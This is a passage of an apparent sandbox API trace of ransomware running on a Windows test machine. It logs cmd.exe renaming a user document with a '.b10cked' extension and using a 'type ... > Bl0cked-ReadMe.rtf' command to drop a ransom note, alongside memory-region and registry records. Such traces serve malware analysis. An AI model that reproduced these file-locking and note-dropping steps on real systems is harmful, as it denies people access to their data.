_MaxCount=0x7) returned 2 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", 
_MaxCount=0x7) returned -3 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned 
-18 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0140.150] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0140.151] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0140.151] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0140.151] _wcsicmp (_String1="WNPDVD~1.DOC", _String2=".") returned 73 [0140.151] _wcsicmp (_String1="WNPDVD~1.DOC", _String2="..") returned 73 [0140.151] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\wnpdvd~1.doc")) returned 0x20 [0140.151] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3c1f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.151] SetErrorMode (uMode=0x0) returned 0x0 [0140.152] SetErrorMode (uMode=0x1) returned 0x0 [0140.152] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC", nBufferLength=0x104, lpBuffer=0x28f02c, lpFilePart=0x28f014 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC", lpFilePart=0x28f014*="WNPDVD~1.DOC") returned 0x3f [0140.152] SetErrorMode (uMode=0x0) returned 0x1 [0140.152] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1")) returned 0x12 [0140.152] _wcsicmp (_String1="WNPDVD~1.DOC", _String2=".") returned 73 [0140.152] _wcsicmp (_String1="WNPDVD~1.DOC", _String2="..") returned 73 [0140.152] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\wnpdvd~1.doc")) returned 0x20 [0140.152] SetErrorMode (uMode=0x0) returned 0x0 [0140.152] SetErrorMode (uMode=0x1) returned 0x0 [0140.152] GetFullPathNameW (in: 
lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC", nBufferLength=0x104, lpBuffer=0x28f4a8, lpFilePart=0x28f240 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC", lpFilePart=0x28f240*="WNPDVD~1.DOC") returned 0x3f [0140.152] SetErrorMode (uMode=0x0) returned 0x1 [0140.152] SetErrorMode (uMode=0x0) returned 0x0 [0140.152] SetErrorMode (uMode=0x1) returned 0x0 [0140.152] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked", nBufferLength=0x104, lpBuffer=0x28f6b0, lpFilePart=0x28f240 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked", lpFilePart=0x28f240*="WnPdVDXwSUv.doc.b10cked") returned 0x4a [0140.152] SetErrorMode (uMode=0x0) returned 0x1 [0140.152] SetLastError (dwErrCode=0x0) [0140.153] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\wnpdvdxwsuv.doc.b10cked")) returned 0xffffffff [0140.153] GetLastError () returned 0x2 [0140.153] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x28ebbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28ebbc) returned 0x3c2138 [0140.153] FindNextFileW (in: hFindFile=0x3c2138, lpFindFileData=0x28ebbc | out: lpFindFileData=0x28ebbc) returned 0 [0140.153] GetLastError () returned 0x12 [0140.153] FindClose (in: hFindFile=0x3c2138 | out: hFindFile=0x3c2138) returned 1 [0140.155] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x3c1cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3c1cc8) returned 0x3c2138 [0140.155] GetFullPathNameW (in: 
lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked", nBufferLength=0x104, lpBuffer=0x28ee54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked", lpFilePart=0x0) returned 0x4a [0140.155] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc", nBufferLength=0x104, lpBuffer=0x28ee54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc", lpFilePart=0x0) returned 0x42 [0140.155] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\wnpdvdxwsuv.doc")) returned 0x20 [0140.155] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\wnpdvdxwsuv.doc"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\wnpdvdxwsuv.doc.b10cked"), dwFlags=0x3) returned 1 [0140.156] FindClose (in: hFindFile=0x3c2138 | out: hFindFile=0x3c2138) returned 1 [0140.156] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28ee08 | out: _Buffer=" 1") returned 9 [0140.156] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.156] GetFileType (hFile=0x7) returned 0x2 [0140.851] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.851] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28ed94 | out: lpMode=0x28ed94) returned 1 [0140.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.852] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28edc8 | out: lpConsoleScreenBufferInfo=0x28edc8) returned 1 [0140.852] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, 
dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0140.852] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x28ee08 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0140.852] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x28edec, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28edec*=0x1a) returned 1 [0140.853] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.853] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.853] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.853] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.853] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.853] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.853] SetConsoleInputExeNameW () returned 0x1 [0140.853] GetConsoleOutputCP () returned 0x1b5 [0140.853] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.853] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.853] exit (_Code=0) Process: id = "150" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16620" os_pid = "0xd3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], 
"CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14536 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14537 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14538 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14539 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 14540 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14541 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14542 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14543 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14544 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 14545 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15426 
start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15427 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15428 start_va = 0x50000 end_va = 0x5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 15429 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15430 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 15431 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15432 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15433 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15434 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15435 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15436 start_va = 0x76b40000 end_va 
= 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15437 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15438 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15439 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15440 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 15441 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15442 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15443 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 15444 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 15445 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 15446 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: 
id = 15447 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 15448 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 15449 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 207 os_tid = 0x5e0 [0139.940] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fa84 | out: lpSystemTimeAsFileTime=0x18fa84*(dwLowDateTime=0x8d572400, dwHighDateTime=0x1d440a9)) [0139.941] GetCurrentProcessId () returned 0xd3c [0139.941] GetCurrentThreadId () returned 0x5e0 [0139.941] GetTickCount () returned 0x2bf87 [0139.941] QueryPerformanceCounter (in: lpPerformanceCount=0x18fa7c | out: lpPerformanceCount=0x18fa7c*=19672983160) returned 1 [0139.941] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0139.941] __set_app_type (_Type=0x1) [0139.941] __p__fmode () returned 0x76b331f4 [0139.942] __p__commode () returned 0x76b331fc [0139.942] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0139.942] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0139.942] GetCurrentThreadId () returned 0x5e0 [0139.942] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x5e0) returned 0x38 [0139.942] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.942] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0139.942] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.942] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0139.942] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fa14 | out: phkResult=0x18fa14*=0x0) returned 0x2 [0139.943] VirtualQuery (in: lpAddress=0x18fa4b, lpBuffer=0x18f9e4, dwLength=0x1c | out: lpBuffer=0x18f9e4*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.943] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f9e4, dwLength=0x1c | out: lpBuffer=0x18f9e4*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0139.943] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f9e4, dwLength=0x1c | out: lpBuffer=0x18f9e4*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0139.943] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f9e4, dwLength=0x1c | out: lpBuffer=0x18f9e4*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.943] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f9e4, dwLength=0x1c | out: lpBuffer=0x18f9e4*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0139.943] GetConsoleOutputCP () returned 0x1b5 [0139.943] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.943] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0139.943] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.943] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0139.943] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.943] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0139.944] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.944] 
SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0139.944] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.944] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0139.944] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.944] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0139.944] GetEnvironmentStringsW () returned 0x2801b8* [0139.945] FreeEnvironmentStringsW (penv=0x2801b8) returned 1 [0139.945] GetEnvironmentStringsW () returned 0x2801b8* [0139.945] FreeEnvironmentStringsW (penv=0x2801b8) returned 1 [0139.945] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e984 | out: phkResult=0x18e984*=0x40) returned 0x0 [0139.945] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x0, lpData=0x18e990*=0xf0, lpcbData=0x18e988*=0x1000) returned 0x2 [0139.945] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x4, lpData=0x18e990*=0x1, lpcbData=0x18e988*=0x4) returned 0x0 [0139.945] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x0, lpData=0x18e990*=0x1, lpcbData=0x18e988*=0x1000) returned 0x2 [0139.945] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x4, lpData=0x18e990*=0x0, lpcbData=0x18e988*=0x4) returned 0x0 [0139.945] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x4, lpData=0x18e990*=0x40, lpcbData=0x18e988*=0x4) returned 0x0 [0139.945] 
RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x4, lpData=0x18e990*=0x40, lpcbData=0x18e988*=0x4) returned 0x0 [0139.945] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x0, lpData=0x18e990*=0x40, lpcbData=0x18e988*=0x1000) returned 0x2 [0139.945] RegCloseKey (hKey=0x40) returned 0x0 [0139.945] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e984 | out: phkResult=0x18e984*=0x40) returned 0x0 [0139.945] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x0, lpData=0x18e990*=0x40, lpcbData=0x18e988*=0x1000) returned 0x2 [0139.946] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x4, lpData=0x18e990*=0x1, lpcbData=0x18e988*=0x4) returned 0x0 [0139.946] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x0, lpData=0x18e990*=0x1, lpcbData=0x18e988*=0x1000) returned 0x2 [0139.946] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x4, lpData=0x18e990*=0x0, lpcbData=0x18e988*=0x4) returned 0x0 [0139.946] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x4, lpData=0x18e990*=0x9, lpcbData=0x18e988*=0x4) returned 0x0 [0139.946] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", 
lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x4, lpData=0x18e990*=0x9, lpcbData=0x18e988*=0x4) returned 0x0 [0139.946] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e98c, lpData=0x18e990, lpcbData=0x18e988*=0x1000 | out: lpType=0x18e98c*=0x0, lpData=0x18e990*=0x9, lpcbData=0x18e988*=0x1000) returned 0x2 [0139.946] RegCloseKey (hKey=0x40) returned 0x0 [0139.946] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0139.946] srand (_Seed=0x5b88636e) [0139.946] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" [0139.946] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > 